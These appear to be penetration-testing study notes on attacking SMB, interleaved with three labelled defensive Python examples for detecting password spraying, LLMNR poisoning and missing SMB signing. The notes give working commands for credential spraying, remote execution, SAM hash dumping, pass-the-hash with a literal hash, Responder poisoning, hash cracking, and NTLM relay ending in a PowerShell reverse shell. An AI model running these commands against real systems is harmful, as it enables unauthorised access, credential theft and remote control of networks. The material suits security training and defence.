
Attacking SMB

  • Provides shared access to files and printers across a network
  • Was designed to run on top of NetBIOS over TCP 139 and UDP 137/138
  • Since Windows 2000, SMB runs directly over TCP 445
  • NetBIOS is now only used as a fallback
  • If 139 is open, SMB is running over NetBIOS
  • Samba is the Linux implementation of SMB
  • MSRPC is commonly used together with SMB

Misconfig

  • null session - no auth required

Anonymous auth

  • If no creds are required, or we find valid creds, we can list the share and get/put files
  • tools: smbclient, smbmap, rpcclient, or enum4linux

File Share

  • smbmap -H 10.129.14.128
  • Permissions are also listed
  • smbmap -H 10.129.14.128 -r notes
  • -r/-R - recursively browse the target share
  • smbmap -H 10.129.14.128 --download "notes\note.txt"
  • smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" - upload to the share notes

RPC

  • rpcclient with a null session can enumerate a DC or a workstation
  • https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf
  • The rpcclient tool offers many commands that execute specific functions on the SMB server to gather information or modify server attributes such as a username (see RPCCLIENT Commands)
  • rpcclient -U'%' 10.10.110.17

Enum4Linux

  • https://github.com/cddmp/enum4linux-ng
  • ./enum4linux-ng.py 10.10.11.45 -A -C

Protocol Attacks

Password Spraying

  • crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
  • --continue-on-success - keep going after a valid credential is found
  • https://web.archive.org/web/20220129050920/https://mpgn.gitbook.io/crackmapexec/getting-started/using-credentials

info

  • SMB attacks against Linux hosts are more limited
  • SMB on Windows has a larger attack surface
  • If this user is an Administrator or has specific privileges, we can perform operations such as:
    • Remote Command Execution
    • Extract Hashes from SAM Database
    • Enumerating Logged-on Users
    • Pass-the-Hash (PTH)

RCE

  • Sysinternals has technical resources and utilities to manage, diagnose, troubleshoot and monitor a Windows environment
  • its tools are freeware

PsExec

  • We can download PsExec from the Microsoft website, or use one of these Linux implementations:
  • Impacket PsExec - Python PsExec-like functionality using RemComSvc.
  • Impacket SMBExec - a similar approach to PsExec without using RemComSvc (the technique is described here). This implementation goes one step further and instantiates a local SMB server to receive the output of the commands, which is useful when the target machine does NOT have a writeable share available.
  • Impacket atexec - executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
  • CrackMapExec - includes an implementation of smbexec and atexec.
  • Metasploit PsExec - Ruby PsExec implementation.

Impacket-PsExec

  • impacket-psexec -h
  • impacket-psexec administrator:'Password123!'@10.10.110.17

CrackMapExec

  • crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Enumerating Logged-on Users

  • If we are in a network with multiple machines
  • other machines may be using the same creds
  • crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
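Both the password spray above and the --loggedon-users sweep across a /24 leave a distinctive trail in the targets' logon events: many accounts failing from one source within a short window, and one account succeeding over the network on many hosts from one source. The following added example (it is not from these notes, and the key=value log format is a constructed simplification of Windows Security events 4625 and 4624, not the real EVTX/XML layout) runs both detections over sample lines; parse_events, detect_spray and detect_sweep are names assumed for this example.

```python
"""Detect password spraying and credentialed host sweeps in logon events.
Added example, not from the original notes; the input is a constructed,
simplified key=value rendering of Windows Security events 4625 (failed logon)
and 4624 (successful logon), not Microsoft's real EVTX/XML layout."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.10.110.5 fails against five accounts in seconds,
# then "administrator" succeeds from it on four hosts; 10.10.110.9 is a
# single user failing twice (a typo, not a spray).
SAMPLE_LOG = """\
2024-05-01T10:00:01 EventID=4625 TargetUser=alice Host=WS01 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:02 EventID=4625 TargetUser=bob Host=WS01 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:03 EventID=4625 TargetUser=carol Host=WS01 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:04 EventID=4625 TargetUser=dave Host=WS01 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:05 EventID=4625 TargetUser=erin Host=WS01 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:06 EventID=4624 TargetUser=administrator Host=WS01 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:07 EventID=4624 TargetUser=administrator Host=WS02 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:08 EventID=4624 TargetUser=administrator Host=WS03 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:00:09 EventID=4624 TargetUser=administrator Host=WS04 SourceIP=10.10.110.5 LogonType=3
2024-05-01T10:30:00 EventID=4625 TargetUser=alice Host=WS01 SourceIP=10.10.110.9 LogonType=3
2024-05-01T10:31:00 EventID=4625 TargetUser=alice Host=WS01 SourceIP=10.10.110.9 LogonType=3
"""


def parse_events(text):
    """One event per line: ISO timestamp followed by key=value fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, *pairs = line.split()
        event = dict(pair.split("=", 1) for pair in pairs)
        event["ts"] = datetime.fromisoformat(stamp)
        events.append(event)
    return events


def _sliding_max(events, key_fn, distinct_fn, window):
    """For events grouped by key_fn, the largest number of distinct
    distinct_fn values seen inside any time window of the given length."""
    groups = defaultdict(list)
    for event in events:
        groups[key_fn(event)].append(event)
    result = {}
    for key, group in groups.items():
        group.sort(key=lambda e: e["ts"])
        start = 0
        for end, event in enumerate(group):
            while event["ts"] - group[start]["ts"] > window:
                start += 1
            seen = {distinct_fn(e) for e in group[start:end + 1]}
            result[key] = max(result.get(key, 0), len(seen))
    return result


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Source IPs whose failed logons cover at least min_users distinct accounts
    within window. Many accounts from one source is the spray signature;
    one account failing repeatedly is a lockout or typo pattern."""
    failures = [e for e in events if e["EventID"] == "4625"]
    counts = _sliding_max(failures, lambda e: e["SourceIP"], lambda e: e["TargetUser"], window)
    return {src: n for src, n in counts.items() if n >= min_users}


def detect_sweep(events, window=timedelta(minutes=5), min_hosts=3):
    """(source IP, account) pairs whose network logons (type 3) succeed on at
    least min_hosts distinct hosts within window: the footprint of one
    credential being tried across a subnet."""
    logons = [e for e in events if e["EventID"] == "4624" and e["LogonType"] == "3"]
    counts = _sliding_max(logons, lambda e: (e["SourceIP"], e["TargetUser"]), lambda e: e["Host"], window)
    return {key: n for key, n in counts.items() if n >= min_hosts}


if __name__ == "__main__":
    events = parse_events(SAMPLE_LOG)
    print("spray:", detect_spray(events))
    print("sweep:", detect_sweep(events))
```

The thresholds and window are deliberately parameters: a spray with a long sleep between attempts will only show up with a wider window and a lower count, at the cost of more false positives from shared jump hosts.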

Extracting Hashes from SAM DB

  • The Security Account Manager (SAM) is a database file that stores users' passwords
  • used for authenticating remote and local users
  • Hacking purposes:
    • authenticating as another user
    • password cracking
    • pass the hash
  • crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Pass-the-Hash (PtH)

  • If we obtain a user's NTLM hash and cannot crack it, we can still use it to authenticate over SMB
  • tools to use:
    • impacket
    • smbmap
    • crackmapexec
  • crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Forced Auth Attacks

  • Create a fake SMB server to capture users' NTLM hashes
  • Responder - https://github.com/lgandx/Responder
  • https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/
  • LLMNR, NBT-NS and MDNS poisoner with built-in rogue servers, SMB among them
  • LLMNR and NBT-NS poisoning are on by default
  • responder -I <interface name>

Start Responder on your tun0 interface

  • responder.py -I tun0
  • This will listen for traffic and capture hashes
  • Captured creds can be:
    • cracked using hashcat
    • relayed to a remote host to complete the authentication and impersonate the user
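Responder only works because hosts multicast LLMNR queries for names they cannot resolve and accept whatever answers. A defender can turn that around: query for a name that cannot exist and treat any answer as a poisoner. The following is an added example, not part of these notes or of Responder, that builds the LLMNR query (RFC 4795, DNS wire format), sends it to the multicast group 224.0.0.252 on UDP 5355, and parses the replies; build_sample_response constructs a poisoner-style reply so the parser can be exercised offline, and the function names are assumptions of this example.

```python
"""LLMNR poisoner detector: ask for a name that cannot exist and treat any
answer as a poisoner. Added example, not part of the notes or of Responder."""
import random
import socket
import struct

LLMNR_GROUP = "224.0.0.252"   # RFC 4795 IPv4 multicast group
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name):
    """DNS-style label encoding: length byte + label, terminated by 0x00."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"


def build_query(name, txid):
    """LLMNR query: 12-byte DNS-shaped header (flags 0, QDCOUNT 1) + one A question."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def _read_name(packet, offset):
    """Decode a label sequence at offset; follow compression pointers (0xC0..)
    for the name text but return the offset just past the field as read."""
    labels, end, hops = [], None, 0
    while True:
        length = packet[offset]
        if length & 0xC0 == 0xC0:            # compression pointer
            hops += 1
            if hops > 8:
                raise ValueError("pointer loop")
            if end is None:
                end = offset + 2
            offset = struct.unpack_from("!H", packet, offset)[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def parse_response(packet, txid, name):
    """Return the A-record addresses in a reply to our query, or [] if the
    packet is not a response to exactly that transaction id and name."""
    try:
        rid, flags, qd, an, _ns, _ar = struct.unpack_from("!HHHHHH", packet, 0)
        if rid != txid or not flags & 0x8000 or qd != 1:   # 0x8000 = QR (response) bit
            return []
        qname, off = _read_name(packet, 12)
        if qname.lower() != name.lower():
            return []
        off += 4                                           # skip QTYPE, QCLASS
        answers = []
        for _ in range(an):
            _, off = _read_name(packet, off)
            rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", packet, off)
            off += 10
            if rtype == QTYPE_A and rdlen == 4:
                answers.append(socket.inet_ntoa(packet[off:off + 4]))
            off += rdlen
        return answers
    except (struct.error, IndexError, ValueError):
        return []


def build_sample_response(txid, name, answer_ip):
    """Constructed reply in the shape a poisoner sends (not a capture): QR set,
    question echoed, one A record whose name is a pointer to offset 12."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)
    answer = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 30, 4) + socket.inet_aton(answer_ip)
    return header + question + answer


def probe(timeout=2.0):
    """Send one query for a random, nonexistent name and collect every
    (responder source IP, advertised IP) pair that answers within timeout."""
    name = "probe-" + "".join(random.choices("abcdefghjkmnpqrstuvwxyz", k=10))
    txid = random.randrange(0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    hits = []
    try:
        sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(2048)
            hits.extend((src, ip) for ip in parse_response(data, txid, name))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    for src, ip in probe():
        print("LLMNR answer for a nonexistent name from %s (points to %s)" % (src, ip))
```

Run it from a host on the segment you want to watch; a legitimate network never answers a query for a random name, so each hit is the address a poisoner is trying to draw authentication to. Disabling LLMNR and NBT-NS by policy removes the attack surface entirely.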

Crack hashes

  • hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
  • If the hash is not cracked, we can relay the captured hash to another machine using:
    • impacket-ntlmrelayx
    • Responder's MultiRelay.py
  • Set SMB to Off in the Responder config file (/etc/responder/Responder.conf)
  • cat /etc/responder/Responder.conf | grep 'SMB ='
  • Execute impacket-ntlmrelayx
  • impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
    • by default the SAM database is dumped
    • -c to execute commands
  • Create a PowerShell #3 base64 reverse shell and run nc -nvlp 9001
    • impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e base64'
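Relaying a captured NTLM authentication to SMB only succeeds when the target does not require message signing, so the first thing a defender wants to know is which hosts require it (by default, domain controllers require signing and member workstations merely enable it). The following is an added example, not from these notes and not Impacket's or Responder's code: it sends a direct-TCP SMB2 NEGOTIATE request on port 445 and reads the SecurityMode field of the response as laid out in MS-SMB2 sections 2.2.3 and 2.2.4. The two sample responses are constructed for offline testing, and check_signing, parse_negotiate_response and the other function names are assumptions of this example.

```python
"""Audit whether an SMB2 server requires message signing. Added example, not
from the original notes: NTLM relay to SMB only succeeds when the target does
not require signing. Formats follow MS-SMB2 2.2.1.2, 2.2.3 and 2.2.4; the
sample responses at the bottom are constructed, not captured."""
import socket
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001    # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002   # SMB2_NEGOTIATE_SIGNING_REQUIRED
DIALECTS = [0x0202, 0x0210, 0x0300, 0x0302]  # 2.0.2 .. 3.0.2; 3.1.1 would need negotiate contexts


def smb2_header(command, flags=0, message_id=0):
    """64-byte SMB2 sync header: StructureSize, CreditCharge, Status, Command,
    CreditRequest, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature."""
    return SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ16s",
        64, 0, 0, command, 1, flags, 0, message_id, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request():
    """NEGOTIATE request: StructureSize 36, DialectCount, SecurityMode (signing
    enabled on our side), Reserved, Capabilities, ClientGuid, ClientStartTime, Dialects."""
    body = struct.pack("<HHHHI16sQ", 36, len(DIALECTS), SIGNING_ENABLED, 0, 0, uuid.uuid4().bytes, 0)
    body += struct.pack("<%dH" % len(DIALECTS), *DIALECTS)
    return smb2_header(SMB2_NEGOTIATE) + body


def parse_negotiate_response(packet):
    """Return the negotiated dialect and the server's signing flags; raise
    ValueError for anything that is not a successful NEGOTIATE response."""
    if len(packet) < 64 + 65 or packet[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 NEGOTIATE response")
    size, _credit_charge, status, command, _credits, flags = struct.unpack_from("<HHIHHI", packet, 4)
    if size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    if status != 0:
        raise ValueError("server returned NTSTATUS 0x%08x" % status)
    body_size, security_mode, dialect = struct.unpack_from("<HHH", packet, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE body size %d" % body_size)
    return {
        "dialect": "0x%04x" % dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def build_sample_response(security_mode, dialect=0x0302):
    """Constructed NEGOTIATE response (not a real capture) carrying the given
    SecurityMode; the 1-byte Buffer makes StructureSize 65 as the spec requires."""
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0, b"\x00" * 16, 0,
        0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0) + b"\x00"
    return smb2_header(SMB2_NEGOTIATE, SMB2_FLAGS_SERVER_TO_REDIR) + body


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def check_signing(host, port=445, timeout=5.0):
    """Negotiate with host over direct TCP/445 (4-byte length framing: a zero
    byte plus a 24-bit big-endian length) and report its signing policy."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        request = build_negotiate_request()
        sock.sendall(struct.pack("!I", len(request)) + request)
        length = struct.unpack("!I", _recv_exact(sock, 4))[0] & 0x00FFFFFF
        return parse_negotiate_response(_recv_exact(sock, length))


if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:
        print(host, check_signing(host))
```

A host that reports signing_required False is one the relay in the notes above would work against; the fix is the "Microsoft network server: Digitally sign communications (always)" policy, which flips that bit on every server in scope.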